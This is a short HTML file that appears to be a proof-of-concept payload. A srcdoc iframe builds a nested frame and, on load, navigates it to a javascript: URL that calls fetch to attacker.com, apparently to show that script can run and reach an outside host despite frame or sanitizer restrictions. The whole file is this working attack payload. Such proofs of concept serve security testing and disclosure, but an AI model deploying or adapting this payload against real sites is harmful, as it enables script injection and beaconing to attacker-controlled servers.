<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe srcdoc="<iframe id=GGGGzMBGJGGGG src=about:blank></iframe>
<script>
window.onload = function() {
    GGGGzMBGJGGGG.addEventListener('load',()=>{GGGGzMBGJGGGG.contentWindow.location.href='javascript:fetch(`https://attacker.com/report/report`)';},{once:true});
};
</script>">
</iframe>
</body>
</html>